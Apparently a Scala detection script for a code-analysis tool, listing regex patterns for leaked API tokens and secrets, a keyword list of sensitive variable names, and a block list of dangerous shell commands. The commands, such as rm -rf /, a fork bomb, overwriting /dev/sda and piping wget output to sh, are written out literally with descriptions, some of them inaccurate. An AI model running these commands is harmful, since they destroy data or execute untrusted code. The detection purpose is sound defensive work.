/* token_pattern.sc
 *
 * Version: 0.0.1
 * Ocular Version: 0.3.34
 * Author: Chetan Conikee <chetan@shiftLeft.io>
 * Execution-mode : Internal
 * Input: Application CPG
 * Output: JSON
 * 
 * Description: 
 * The following script contains token and hard coded secrets that might have been
 * embedded in a code repository 
 */


case class APIPatterns(domain : String, platform : String, keyType : String, expr : String)

//  Value based comparison of common tokens embedded in code  
val sensitiveTokenPatterns = List(  
    APIPatterns("IaaS","Amazon","S3 Object Bucket" , "s3.amazonaws.com"),
    APIPatterns("IaaS","Amazon","Access ID" , "(?<![A-Z0-9])[A-Z0-9]{20}(?![A-Z0-9])"),
    APIPatterns("IaaS","Amazon","AWS Secret ID" , "(?<![A-Za-z0-9/+=])[A-Za-z0-9/+=]{40}(?![A-Za-z0-9/+=])"),
    APIPatterns("IaaS","Amazon","MWS Auth Token" , "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}"),
    APIPatterns("Social Media","Facebook", "Access Token" , "EAACEdEose0cBA[0-9A-Za-z]+"),
    APIPatterns("Social Media","Facebook", "OAuth" , "[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*['|\"][0-9a-f]{32}['|\"]"),
    APIPatterns("Social Media","Flickr", "Client Id" , "[0-9a-f]{32}"),
    APIPatterns("Social Media","Flickr" ,"Secret Key" , "[0-9a-f]{16}"),
    APIPatterns("Social Media","Foursquare", "Client Id" , ",[0-9A-Z]{48}"),
    APIPatterns("Social Media","Foursquare", "Secret Key" , ",[0-9A-Z]{48}"),
    APIPatterns("IaaS", "GitHub" , "Access Token", "[g|G][i|I][t|T][h|H][u|U][b|B].*['|\"][0-9a-zA-Z]{35,40}['|\"]"),
    APIPatterns("IaaS", "Generic" ,"API Key" , "[a|A][p|P][i|I][_]?[k|K][e|E][y|Y].*['|\"][0-9a-zA-Z]{32,45}['|\"]"),
    APIPatterns("IaaS", "Generic" ,"Secret" , "[s|S][e|E][c|C][r|R][e|E][t|T].*['|\"][0-9a-zA-Z]{32,45}['|\"]"),
    APIPatterns("IaaS","Google", "API Key" , "AIza[0-9A-Za-z\\-_]{35}"),
    APIPatterns("IaaS","Google", "Cloud Platform API Key" , "AIza[0-9A-Za-z\\-_]{35}"),
    APIPatterns("IaaS","Google", "Cloud Platform OAuth" , "[0-9]+-[0-9A-Za-z_]{32}\\.apps\\.googleusercontent\\.com"),
    APIPatterns("IaaS","Google","Drive API Key" , "AIza[0-9A-Za-z\\-_]{35}"),
    APIPatterns("IaaS","Google" ,"Drive OAuth" , "[0-9]+-[0-9A-Za-z_]{32}\\.apps\\.googleusercontent\\.com"),
    APIPatterns("IaaS","Google", "(GCP) Service-account" , "\"type\": \"service_account\""),
    APIPatterns("IaaS","Google", "Gmail API Key" , "AIza[0-9A-Za-z\\-_]{35}"),
    APIPatterns("IaaS","Google" ,"Gmail OAuth" , "[0-9]+-[0-9A-Za-z_]{32}\\.apps\\.googleusercontent\\.com"),
    APIPatterns("IaaS","Google" ,"OAuth Access Token" , "ya29\\.[0-9A-Za-z\\-_]+"),
    APIPatterns("Social Media","Google", "YouTube API Key" , "AIza[0-9A-Za-z\\-_]{35}"),
    APIPatterns("Social Media","Google", "YouTube OAuth" , "[0-9]+-[0-9A-Za-z_]{32}\\.apps\\.googleusercontent\\.com"),
    APIPatterns("IaaS","Heroku", "API Key" , "[h|H][e|E][r|R][o|O][k|K][u|U].*[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}"),
    APIPatterns("IaaS","MailChimp", "API Key" , "[0-9a-f]{32}-us[0-9]{1,2}"),
    APIPatterns("IaaS","Mailgun" ,"API Key" , "key-[0-9a-zA-Z]{32}"),
    APIPatterns("IaaS","Generic","Password in URL" , "[a-zA-Z]{3,10}://[^/\\s:@]{3,20}:[^/\\s:@]{3,20}@.{1,100}[\"'\\s]"),
    APIPatterns("Finance","PayPal Braintree", "Access Token" , "access_token\\$production\\$[0-9a-z]{16}\\$[0-9a-f]{32}"),
    APIPatterns("ECommerce","Picatic", "API Key" , "sk_live_[0-9a-z]{32}"),
    APIPatterns("IaaS","Slack","Token" , "(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})"),
    APIPatterns("IaaS","Slack", "Webhook" , "https://hooks.slack.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}"),
    APIPatterns("IaaS","Slack","API Key" , "sk_live_[0-9a-zA-Z]{24}"),
    APIPatterns("Finance","Stripe", "Restricted API Key" , "rk_live_[0-9a-zA-Z]{24}"),
    APIPatterns("Finance", "Square", "Access Token" , "sq0atp-[0-9A-Za-z\\-_]{22}"),
    APIPatterns("Finance","Square", "OAuth Secret" , "sq0csp-[0-9A-Za-z\\-_]{43}"),
    APIPatterns("Communications", "Twilio" , "API Key" , "SK[0-9a-fA-F]{32}"),
    APIPatterns("Social Media","Twitter", "Secret Key" , "[0-9a-zA-Z]{35,44}"),
    APIPatterns("Social Media","Twitter" ,"Access Token" , "[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*[1-9][0-9]+-[0-9a-zA-Z]{40}"),
    APIPatterns("Social Media","Twitter", "OAuth" , "[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*['|\"][0-9a-zA-Z]{35,44}['|\"]")
)

val base64Pattern = "^([A-Za-z0-9+/]{4})*(()|[A-Za-z0-9+/][AQgw]==|[A-Za-z0-9+/]{2}[AEIMQUYcgkosw048]=)$"

val weakCrypto = "\"(DES|MD4|MD5|RC4|RC2|Blowfish|SHA-1|ECB)\""

case class Command(title : String, pattern : String, description : String)


//  Verify for dangerous commands 
val badCommandPatterns = List(
    Command("Executing Shell Script", 
        "sh /tmp/shellcode.sh", 
        "This command triggers execution of a shell script"),
    Command("Fork Bomb", 
        ":(){:|:&};:", 
        "This is a simple bash function which once executed creates copies of itself which in turn creates another set of copies of itself. This consumes the CPU time and memory. Thus, it runs recursively until the system freezes"), 
    Command("Overwrite Hard Drive",
        "command > dev/sda", 
        "If you have executed the following command by mistake or accidentally on your hard drive, then recovery is quite impossible"),
    Command("Implode Hard Drive", 
        "mv /home/root/*  dev/null", 
        "The abovementioned command moves all the data in the home/root folder to the black hole thus resulting in data loss."),
    Command("Download Malicious Script", 
        "wget http: //an-untrusted-url -o- | sh", 
        "The above-mentioned commands download the content from the URL provided and run the downloaded script."),
    Command("Format Hard Drive", 
        "mkfs.ext3 /dev/sda", 
        "When this command is executed, it formats the specified partition on the hard drive and reformats it according to the specified file system which is ext3 in the abovementioned command."),
    Command("Flushing the hard drive", 
        "anybashcommand > /dev/sda", 
        "This command writes directly to primary hard drive and therefore crash all the data with raw buffer data."),
    Command("Flush File Contents", 
        ">file", 
        "This command is responsible for flushing the contents of the file, therefore, double check the command you are executing."),
    Command("Edit Previous Command", 
        "^foo^bar", 
        "While it makes it easier not to type all the previous command again and execute it, it can also infuse malicious content in your previously run command. Therefore, it is necessary to be sure if it’s suitable for you to use this command."),
    Command("Write Random Junk to Hard Drive", 
        "dd if=/dev/random of=/dev/sda", 
        "The aftereffects of this command are that your system will not be recovered."),
    Command("Change User Permissions systemwide", 
        "chmod -R 777/", 
        "By executing this command, you are providing all the users of the system to be able to read, write and execute data on your file system"),
    Command("Deletes Everything",
        "rm -rf /",
        "The command deletes everything it possibly can, including files on your hard drive and files on connected removable media devices"),
    Command("Home Directory to /dev/null",
        "mv ~ /dev/null",
        "moving something to /dev/null is the same thing as destroying it. Think of /dev/null as a black hole. Essentially, mv ~ /dev/null sends all your personal files into a black hole."),
    Command("Black Hole in Hard Drive", 
        "mv / /dev/null", 
        "dev/null is a special location in hard disk which can be think as a black hole. Everything you put into it will be dissolved"),
    Command("Kernel Panic - 1", 
        "dd if=/dev/random of=/dev/port", 
        "Running this command will result in a kernel panic, forcing you to reboot your system"),
    Command("Kernel Panic - 2", 
        "echo 1 > /proc/sys/kernel/panic", 
        "Running this command will result in a kernel panic, forcing you to reboot your system"),
    Command("Kernel Panic - 3", 
        "cat /dev/port", 
        "Running this command will result in a kernel panic, forcing you to reboot your system"),
    Command("Kernel Panic - 4", 
        "cat /dev/zero > /dev/mem", 
        "Running this command will result in a kernel panic, forcing you to reboot your system"),
    Command("Disable Root Command rights", 
        "rm -f /usr/bin/sudo;rm -f /bin/su", 
        "This command force deletes both commands from your system without any confirmation"),
    Command("Delete boot directory", 
        "rm -rf /boot", 
        "Deleting it will unable to perform any system startup and thereby crash the OS")
)

// Keywords for variable names 

val sensitiveNames = List(
    "acceptInsecureCerts",
    "acceptSslCerts",
    "accessibilityChecks",
    "ACCESSKEY",
    "ACCESSKEYID",
    "ACCESS_KEY",
    "ACCESS_KEY_ID",
    "ACCESS_KEY_SECRET",
    "ACCESS_SECRET",
    "ACCESS_TOKEN",
    "ACCOUNT_SID",
    "ADMIN_EMAIL",
    "ADZERK_API_KEY",
    "AGFA",
    "AiYPFLTRxoiZJ9j0bdHjGOffCMvotZhtc9xv0VXVijGdHiIM",
    "AKIA[0-9A-Z]{16}",
    "ALARM_CRON",
    "ALGOLIA_ADMIN_KEY_1",
    "ALGOLIA_ADMIN_KEY_2",
    "ALGOLIA_ADMIN_KEY_MCM",
    "ALGOLIA_API_KEY",
    "ALGOLIA_API_KEY_MCM",
    "ALGOLIA_API_KEY_SEARCH",
    "ALGOLIA_APPLICATION_ID",
    "ALGOLIA_APPLICATION_ID_1",
    "ALGOLIA_APPLICATION_ID_2",
    "ALGOLIA_APPLICATION_ID_MCM",
    "ALGOLIA_APP_ID",
    "ALGOLIA_APP_ID_MCM",
    "ALGOLIA_SEARCH_API_KEY",
    "ALGOLIA_SEARCH_KEY",
    "ALGOLIA_SEARCH_KEY_1",
    "ALIAS_NAME",
    "ALIAS_PASS",
    "ALICLOUD_ACCESS_KEY",
    "ALICLOUD_SECRET_KEY",
    "amazon_bucket_name",
    "AMAZON_SECRET_ACCESS_KEY",
    "AMQP://GUEST:GUEST@",
    "ANACONDA_TOKEN",
    "ANALYTICS",
    "ANDROID_DOCS_DEPLOY_TOKEN",
    "android_sdk_license",
    "android_sdk_preview_license",
    "ANSIBLE_VAULT_PASSWORD",
    "aos_key",
    "aos_sec",
    "APIARY_API_KEY",
    "APIGW_ACCESS_TOKEN",
    "API_KEY",
    "API_KEY_MCM",
    "API_KEY_SECRET",
    "API_KEY_SID",
    "API_SECRET",
    "appClientSecret",
    "APPLE_ID_PASSWORD",
    "APPLE_ID_USERNAME",
    "applicationCacheEnabled",
    "APPLICATION_ID",
    "APPLICATION_ID_MCM",
    "APP_BUCKET_PERM",
    "APP_ID",
    "APP_NAME",
    "APP_REPORT_TOKEN_KEY",
    "APP_SECRETE",
    "APP_SETTINGS",
    "APP_TOKEN",
    "ARGOS_TOKEN",
    "ARTIFACTORY_KEY",
    "ARTIFACTORY_USERNAME",
    "ARTIFACTS",
    "ARTIFACTS_AWS_ACCESS_KEY_ID",
    "ARTIFACTS_AWS_SECRET_ACCESS_KEY",
    "ARTIFACTS_BUCKET",
    "ARTIFACTS_KEY",
    "ARTIFACTS_SECRET",
    "ASSISTANT_IAM_APIKEY",
    "ATOKEN",
    "AURORA_STRING_URL",
    "AUTH0_API_CLIENTID",
    "AUTH0_API_CLIENTSECRET",
    "AUTH0_AUDIENCE",
    "AUTH0_CALLBACK_URL",
    "AUTH0_CLIENT_ID",
    "AUTH0_CLIENT_SECRET",
    "AUTH0_CONNECTION",
    "AUTH0_DOMAIN",
    "AUTH",
    "AUTHOR_EMAIL_ADDR",
    "AUTHOR_NPM_API_KEY",
    "AUTH_TOKEN",
    "AVbcnrfDmp7k",
    "AWS-ACCT-ID",
    "AWS-KEY",
    "AWS-SECRETS",
    "AWS",
    "AWS.config.accessKeyId",
    "AWS.config.secretAccessKey",
    "AWSACCESSKEYID",
    "AWSCN_ACCESS_KEY_ID",
    "AWSCN_SECRET_ACCESS_KEY",
    "AWSSECRETKEY",
    "AWS_ACCESS",
    "AWS_ACCESS_KEY",
    "AWS_ACCESS_KEY_ID",
    "AWS_CF_DIST_ID",
    "AWS_DEFAULT",
    "AWS_DEFAULT_REGION",
    "AWS_S3_BUCKET",
    "AWS_SECRET",
    "AWS_SECRET_ACCESS_KEY",
    "AWS_SECRET_KEY",
    "AWS_SES_ACCESS_KEY_ID",
    "AWS_SES_SECRET_ACCESS_KEY",
    "aX5xTOsQFzwacdLtlNkKJ3K64",
    "B2_ACCT_ID",
    "B2_APP_KEY",
    "B2_BUCKET",
    "baseUrlTravis",
    "bintrayKey",
    "bintrayUser",
    "BINTRAY_APIKEY",
    "BINTRAY_API_KEY",
    "BINTRAY_GPG_PASSWORD",
    "BINTRAY_KEY",
    "BINTRAY_TOKEN",
    "BINTRAY_USER",
    "BLhLRKwsTLnPm8",
    "BLUEMIX",
    "BLUEMIX_ACCOUNT",
    "BLUEMIX_API_KEY",
    "BLUEMIX_AUTH",
    "BLUEMIX_NAMESPACE",
    "BLUEMIX_ORG",
    "BLUEMIX_ORGANIZATION",
    "BLUEMIX_PASS",
    "BLUEMIX_PASSWORD",
    "BLUEMIX_PASS_PROD",
    "BLUEMIX_PWD",
    "BLUEMIX_SPACE",
    "BLUEMIX_USER",
    "BLUEMIX_USERNAME",
    "BRACKETS_REPO_OAUTH_TOKEN",
    "branch",
    "browserConnectionEnabled",
    "BROWSERSTACK_ACCESS_KEY",
    "BROWSERSTACK_BUILD",
    "BROWSERSTACK_PARALLEL_RUNS",
    "BROWSERSTACK_PROJECT_NAME",
    "BROWSERSTACK_USERNAME",
    "BROWSERSTACK_USE_AUTOMATE",
    "BROWSER_STACK_ACCESS_KEY",
    "BROWSER_STACK_USERNAME",
    "BUCKETEER_AWS_ACCESS_KEY_ID",
    "BUCKETEER_AWS_SECRET_ACCESS_KEY",
    "BUCKETEER_BUCKET_NAME",
    "BUILT_BRANCH_DEPLOY_KEY",
    "BUNDLESIZE_GITHUB_TOKEN",
    "BUNDLE_GEMS__CONTRIBSYS__COM",
    "BUNDLE_GEM__ZDSYS__COM",
    "BUNDLE_ZDREPO__JFROG__IO",
    "BXIAM",
    "BX_PASSWORD",
    "BX_USERNAME",
    "cacdc",
    "CACHE_S3_SECRET_KEY",
    "CACHE_URL",
    "CARGO_TOKEN",
    "casc",
    "CASPERJS_TIMEOUT",
    "CATTLE_ACCESS_KEY",
    "CATTLE_AGENT_INSTANCE_AUTH",
    "CATTLE_SECRET_KEY",
    "CC_TEST_REPORTER_ID",
    "CC_TEST_REPOTER_ID",
    "cdascsa",
    "cdscasc",
    "CENSYS_SECRET",
    "CENSYS_UID",
    "CERTIFICATE_OSX_P12",
    "CERTIFICATE_PASSWORD",
    "CF_ORGANIZATION",
    "CF_PASSWORD",
    "CF_PROXY_HOST",
    "CF_SPACE",
    "CF_USERNAME",
    "channelId",
    "CHEVERNY_TOKEN",
    "CHROME_CLIENT_ID",
    "CHROME_CLIENT_SECRET",
    "CHROME_EXTENSION_ID",
    "CHROME_REFRESH_TOKEN",
    "CI_DEPLOY_PASSWORD",
    "CI_DEPLOY_USER",
    "CI_DEPLOY_USERNAME",
    "CI_NAME",
    "CI_PROJECT_NAMESPACE",
    "CI_PROJECT_URL",
    "CI_REGISTRY_USER",
    "CI_SERVER_NAME",
    "CI_USER_TOKEN",
    "CLAIMR_DATABASE",
    "CLAIMR_DB",
    "CLAIMR_SUPERUSER",
    "CLAIMR_TOKEN",
    "CLIENT_ID",
    "CLIENT_SECRET",
    "CLI_E2E_CMA_TOKEN",
    "CLI_E2E_ORG_ID",
    "clojars_password",
    "clojars_username",
    "CLOUDAMQP_URL",
    "CLOUDANT_APPLIANCE_DATABASE",
    "CLOUDANT_ARCHIVED_DATABASE",
    "CLOUDANT_AUDITED_DATABASE",
    "CLOUDANT_DATABASE",
    "CLOUDANT_INSTANCE",
    "CLOUDANT_ORDER_DATABASE",
    "CLOUDANT_PARSED_DATABASE",
    "CLOUDANT_PASSWORD",
    "CLOUDANT_PROCESSED_DATABASE",
    "CLOUDANT_SERVICE_DATABASE",
    "CLOUDANT_USERNAME",
    "CLOUDFLARE_API_KEY",
    "CLOUDFLARE_AUTH_EMAIL",
    "CLOUDFLARE_AUTH_KEY",
    "CLOUDFLARE_CREVIERA_ZONE_ID",
    "CLOUDFLARE_EMAIL",
    "CLOUDFLARE_ZONE_ID",
    "CLOUDFRONT_DISTRIBUTION_ID",
    "CLOUDINARY_URL",
    "CLOUDINARY_URL_EU",
    "CLOUDINARY_URL_STAGING",
    "CLOUD_API_KEY",
    "CLUSTER",
    "CLUSTER_NAME",
    "CLU_REPO_URL",
    "CLU_SSH_PRIVATE_KEY_BASE64",
    "CN_ACCESS_KEY_ID",
    "CN_SECRET_ACCESS_KEY",
    "COCOAPODS_TRUNK_EMAIL",
    "COCOAPODS_TRUNK_TOKEN",
    "CODACY_PROJECT_TOKEN",
    "CODECLIMATE_REPO_TOKEN",
    "CODECOV_TOKEN",
    "coding_token",
    "COMPONENT",
    "CONEKTA_APIKEY",
    "CONFIGURATION_PROFILE_SID",
    "CONFIGURATION_PROFILE_SID_P2P",
    "CONFIGURATION_PROFILE_SID_SFU",
    "CONSUMERKEY",
    "CONSUMER_KEY",
    "CONTENTFUL_ACCESS_TOKEN",
    "CONTENTFUL_CMA_TEST_TOKEN",
    "CONTENTFUL_INTEGRATION_MANAGEMENT_TOKEN",
    "CONTENTFUL_INTEGRATION_SOURCE_SPACE",
    "CONTENTFUL_MANAGEMENT_API_ACCESS_TOKEN",
    "CONTENTFUL_MANAGEMENT_API_ACCESS_TOKEN_NEW",
    "CONTENTFUL_ORGANIZATION",
    "CONTENTFUL_PHP_MANAGEMENT_TEST_TOKEN",
    "CONTENTFUL_TEST_ORG_CMA_TOKEN",
    "CONTENTFUL_V2_ACCESS_TOKEN",
    "CONTENTFUL_V2_ORGANIZATION",
    "CONVERSATION_PASSWORD",
    "CONVERSATION_URL",
    "CONVERSATION_USERNAME",
    "COREAPI_HOST",
    "COS_SECRETS",
    "COVERALLS_API_TOKEN",
    "COVERALLS_REPO_TOKEN",
    "COVERALLS_SERVICE_NAME",
    "COVERALLS_TOKEN",
    "COVERITY_SCAN_NOTIFICATION_EMAIL",
    "COVERITY_SCAN_TOKEN",
    "cred",
    "csac",
    "cssSelectorsEnabled",
    "cTjHuw0saao68eS5s",
    "CXQEvvnEow",
    "CYPRESS_RECORD_KEY",
    "DANGER_GITHUB_API_TOKEN",
    "DANGER_VERBOSE",
    "databaseEnabled",
    "DATABASE_HOST",
    "DATABASE_NAME",
    "DATABASE_PASSWORD",
    "DATABASE_PORT",
    "DATABASE_USER",
    "DATABASE_USERNAME",
    "datadog_api_key",
    "datadog_app_key",
    "DBP",
    "DB_CONNECTION",
    "DB_DATABASE",
    "DB_HOST",
    "DB_PASSWORD",
    "DB_PORT",
    "DB_PW",
    "DB_USER",
    "DB_USERNAME",
    "DDGC_GITHUB_TOKEN",
    "DDG_TEST_EMAIL",
    "DDG_TEST_EMAIL_PW",
    "DEPLOY_DIR",
    "DEPLOY_DIRECTORY",
    "DEPLOY_HOST",
    "DEPLOY_PASSWORD",
    "DEPLOY_PORT",
    "DEPLOY_SECURE",
    "DEPLOY_TOKEN",
    "DEPLOY_USER",
    "DEST_TOPIC",
    "DHL_SOLDTOACCOUNTID",
    "DH_END_POINT_1",
    "DH_END_POINT_2",
    "DIGITALOCEAN_ACCESS_TOKEN",
    "DIGITALOCEAN_SSH_KEY_BODY",
    "DIGITALOCEAN_SSH_KEY_IDS",
    "DOCKER-REGISTRY",
    "DOCKER",
    "dockerhubPassword",
    "dockerhubUsername",
    "DOCKERHUB_PASSWORD",
    "DOCKER_EMAIL",
    "DOCKER_HUB_PASSWORD",
    "DOCKER_HUB_USERNAME",
    "DOCKER_KEY",
    "DOCKER_PASS",
    "DOCKER_PASSWD",
    "DOCKER_PASSWORD",
    "DOCKER_POSTGRES_URL",
    "DOCKER_RABBITMQ_HOST",
    "docker_repo",
    "DOCKER_TOKEN",
    "DOCKER_USER",
    "DOCKER_USERNAME",
    "DOORDASH_AUTH_TOKEN",
    "DRIVER_NAME",
    "DROPBOX",
    "DROPBOX_OAUTH_BEARER",
    "DROPLET_TRAVIS_PASSWORD",
    "duration",
    "dv3U5tLUZ0",
    "DXA",
    "ELASTICSEARCH_HOST",
    "ELASTICSEARCH_PASSWORD",
    "ELASTICSEARCH_USERNAME",
    "ELASTIC_CLOUD_AUTH",
    "ELASTIC_CLOUD_ID",
    "email",
    "EMAIL_NOTIFICATION",
    "ENCRYPTION_PASSWORD",
    "END_USER_PASSWORD",
    "END_USER_USERNAME",
    "ensureCleanSession",
    "env.GITHUB_OAUTH_TOKEN",
    "env.HEROKU_API_KEY",
    "env.SONATYPE_PASSWORD",
    "env.SONATYPE_USERNAME",
    "ENV_KEY",
    "ENV_SDFCAcctSDO_QuipAcctVineetPersonal",
    "ENV_SECRET",
    "ENV_SECRET_ACCESS_KEY",
    "eureka.awsAccessId",
    "eureka.awsSecretKey",
    "ExcludeRestorePackageImports",
    "EXPORT_SPACE_ID",
    "EXP_PASSWORD",
    "EXP_USERNAME",
    "EXTENSION_ID",
    "EZiLkw9g39IgxjDsExD2EEu8U9jyz8iSmbKsrK6Z4L3BWO6a0gFakBAfWR1Rsb15UfVPYlJgPwtAdbgQ65ElgVeyTdkDCuE64iby2nZeP4",
    "F97qcq0kCCUAlLjAoyJg",
    "FACEBOOK",
    "FBTOOLS_TARGET_PROJECT",
    "FDfLgJkS3bKAdAU24AS5X8lmHUJB94",
    "FEEDBACK_EMAIL_RECIPIENT",
    "FEEDBACK_EMAIL_SENDER",
    "FI1_RECEIVING_SEED",
    "FI1_SIGNING_SEED",
    "FI2_RECEIVING_SEED",
    "FI2_SIGNING_SEED",
    "FILE_PASSWORD",
    "FIREBASE_API_JSON",
    "FIREBASE_API_TOKEN",
    "FIREBASE_KEY",
    "FIREBASE_PROJECT",
    "FIREBASE_PROJECT_DEVELOP",
    "FIREBASE_PROJECT_ID",
    "FIREBASE_SERVICE_ACCOUNT",
    "FIREBASE_TOKEN",
    "FIREFOX_CLIENT",
    "FIREFOX_ISSUER",
    "FIREFOX_SECRET",
    "FLASK_SECRET_KEY",
    "FLICKR",
    "FLICKR_API_KEY",
    "FLICKR_API_SECRET",
    "FOO",
    "FOSSA_API_KEY",
    "fR457Xg1zJIz2VcTD5kgSGAPfPlrYx2xnR5yILYiaWiLqQ1rhFKQZ0rwOZ8Oiqk8nPXkSyXABr9B8PhCFJGGKJIqDI39Qe6XCXAN3GMH2zVuUDfgZCtdQ8KtM1Qg71IR4g",
    "ftp_host",
    "FTP_LOGIN",
    "FTP_PASSWORD",
    "FTP_PW",
    "FTP_USER",
    "ftp_username",
    "fvdvd",
    "gateway",
    "GCLOUD_BUCKET",
    "GCLOUD_PROJECT",
    "GCLOUD_SERVICE_KEY",
    "GCR_PASSWORD",
    "GCR_USERNAME",
    "GCS_BUCKET",
    "ggFqFEKCd54gCDasePLTztHeC4oL104iaQ",
    "GHB_TOKEN",
    "GHOST_API_KEY",
    "GH_API_KEY",
    "GH_EMAIL",
    "GH_NAME",
    "GH_NEXT_OAUTH_CLIENT_ID",
    "GH_NEXT_OAUTH_CLIENT_SECRET",
    "GH_NEXT_UNSTABLE_OAUTH_CLIENT_ID",
    "GH_NEXT_UNSTABLE_OAUTH_CLIENT_SECRET",
    "GH_OAUTH_CLIENT_ID",
    "GH_OAUTH_CLIENT_SECRET",
    "GH_OAUTH_TOKEN",
    "GH_REPO_TOKEN",
    "GH_TOKEN",
    "GH_UNSTABLE_OAUTH_CLIENT_ID",
    "GH_UNSTABLE_OAUTH_CLIENT_SECRET",
    "GH_USER_EMAIL",
    "GH_USER_NAME",
    "GITHUB_ACCESS_TOKEN",
    "GITHUB_API_KEY",
    "GITHUB_API_TOKEN",
    "GITHUB_AUTH",
    "GITHUB_AUTH_TOKEN",
    "GITHUB_AUTH_USER",
    "GITHUB_CLIENT_ID",
    "GITHUB_CLIENT_SECRET",
    "GITHUB_DEPLOYMENT_TOKEN",
    "GITHUB_DEPLOY_HB_DOC_PASS",
    "GITHUB_HUNTER_TOKEN",
    "GITHUB_HUNTER_USERNAME",
    "GITHUB_KEY",
    "GITHUB_OAUTH",
    "GITHUB_OAUTH_TOKEN",
    "GITHUB_PASSWORD",
    "GITHUB_PWD",
    "GITHUB_RELEASE_TOKEN",
    "GITHUB_REPO",
    "GITHUB_TOKEN",
    "GITHUB_TOKENS",
    "GITHUB_USER",
    "GITHUB_USERNAME",
    "GITLAB_USER_EMAIL",
    "GITLAB_USER_LOGIN",
    "GIT_AUTHOR_EMAIL",
    "GIT_AUTHOR_NAME",
    "GIT_COMMITTER_EMAIL",
    "GIT_COMMITTER_NAME",
    "GIT_EMAIL",
    "GIT_NAME",
    "GIT_TOKEN",
    "GIT_USER",
    "GK_LOCK_DEFAULT_BRANCH",
    "GOGS_PASSWORD",
    "GOOGLEAPIS.COM/",
    "GOOGLEUSERCONTENT.COM",
    "GOOGLE_ACCOUNT_TYPE",
    "GOOGLE_CLIENT_EMAIL",
    "GOOGLE_CLIENT_ID",
    "GOOGLE_CLIENT_SECRET",
    "GOOGLE_MAPS_API_KEY",
    "GOOGLE_PRIVATE_KEY",
    "gpg.passphrase",
    "GPG_EMAIL",
    "GPG_ENCRYPTION",
    "GPG_EXECUTABLE",
    "GPG_KEYNAME",
    "GPG_KEY_NAME",
    "GPG_NAME",
    "GPG_OWNERTRUST",
    "GPG_PASSPHRASE",
    "GPG_PRIVATE_KEY",
    "GPG_SECRET_KEYS",
    "gradle.publish.key",
    "gradle.publish.secret",
    "GRADLE_SIGNING_KEY_ID",
    "GRADLE_SIGNING_PASSWORD",
    "GREN_GITHUB_TOKEN",
    "GRGIT_USER",
    "groupToShareTravis",
    "HAB_AUTH_TOKEN",
    "HAB_KEY",
    "handlesAlerts",
    "hasTouchScreen",
    "HB_CODESIGN_GPG_PASS",
    "HB_CODESIGN_KEY_PASS",
    "HEROKU_API_KEY",
    "HEROKU_API_USER",
    "HEROKU_EMAIL",
    "HEROKU_TOKEN",
    "HOCKEYAPP_TOKEN",
    "HOMEBREW_GITHUB_API_TOKEN",
    "HOOKS.SLACK.COM",
    "HOST",
    "hpmifLs",
    "Hso3MqoJfx0IdpnYbgvRCy8zJWxEdwJn2pC4BoQawJx8OgNSx9cjCuy6AH93q2zcQ",
    "HUB_DXIA2_PASSWORD",
    "Hxm6P0NESfV0whrZHyVOaqIRrbhUsK9j4YP8IMFoI4qYp4g",
    "I6SEeHdMJwAvqM6bNXQaMJwJLyZHdAYK9DQnY",
    "ibCWoWs74CokYVA",
    "id",
    "IJ_REPO_PASSWORD",
    "IJ_REPO_USERNAME",
    "IMAGE",
    "INDEX_NAME",
    "INSTAGRAM",
    "INTEGRATION_TEST_API_KEY",
    "INTEGRATION_TEST_APPID",
    "INTERNAL-SECRETS",
    "IOS_DOCS_DEPLOY_TOKEN",
    "IRC_NOTIFICATION_CHANNEL",
    "isbooleanGood",
    "ISDEVELOP",
    "isParentAllowed",
    "iss",
    "ISSUER",
    "ITEST_GH_TOKEN",
    "java.net.UnknownHostException",
    "javascriptEnabled",
    "JDBC:MYSQL",
    "jdbc_databaseurl",
    "jdbc_host",
    "jdbc_user",
    "JWT_SECRET",
    "jxoGfiQqqgvHtv4fLzI",
    "KAFKA_ADMIN_URL",
    "KAFKA_INSTANCE_NAME",
    "KAFKA_REST_URL",
    "KEY",
    "KEYID",
    "KEYSTORE_PASS",
    "KOVAN_PRIVATE_KEY",
    "KUBECFG_S3_PATH",
    "KUBECONFIG",
    "KXOlTsN3VogDop92M",
    "LEANPLUM_APP_ID",
    "LEANPLUM_KEY",
    "LEKTOR_DEPLOY_PASSWORD",
    "LEKTOR_DEPLOY_USERNAME",
    "LICENSES_HASH",
    "LICENSES_HASH_TWO",
    "LIGHTHOUSE_API_KEY",
    "LINKEDIN_CLIENT_ID",
    "LINKEDIN_CLIENT_SECRET",
    "LINODE_INSTANCE_ID",
    "LINODE_VOLUME_ID",
    "LINUX_SIGNING_KEY",
    "LL_API_SHORTNAME",
    "LL_PUBLISH_URL",
    "LL_SHARED_KEY",
    "LL_USERNAME",
    "locationContextEnabled",
    "LOCATION_ID",
    "LOGNAME",
    "LOGOUT_REDIRECT_URI",
    "LOOKER_TEST_RUNNER_CLIENT_ID",
    "LOOKER_TEST_RUNNER_CLIENT_SECRET",
    "LOOKER_TEST_RUNNER_ENDPOINT",
    "LOTTIE_HAPPO_API_KEY",
    "LOTTIE_HAPPO_SECRET_KEY",
    "LOTTIE_S3_API_KEY",
    "LOTTIE_S3_SECRET_KEY",
    "LOTTIE_UPLOAD_CERT_KEY_PASSWORD",
    "LOTTIE_UPLOAD_CERT_KEY_STORE_PASSWORD",
    "lr7mO294",
    "MADRILL",
    "MAGENTO_AUTH_PASSWORD",
    "MAGENTO_AUTH_USERNAME",
    "MAGENTO_PASSWORD",
    "MAGENTO_USERNAME",
    "mailchimp_api_key",
    "MAILCHIMP_KEY",
    "mailchimp_list_id",
    "mailchimp_user",
    "MAILER_HOST",
    "MAILER_PASSWORD",
    "MAILER_TRANSPORT",
    "MAILER_USER",
    "MAILGUN_APIKEY",
    "MAILGUN_API_KEY",
    "MAILGUN_DOMAIN",
    "MAILGUN_PASSWORD",
    "MAILGUN_PRIV_KEY",
    "MAILGUN_PUB_APIKEY",
    "MAILGUN_PUB_KEY",
    "MAILGUN_SECRET_API_KEY",
    "MAILGUN_TESTDOMAIN",
    "MAIL_PASSWORD",
    "MAIL_USERNAME",
    "ManagementAPIAccessToken",
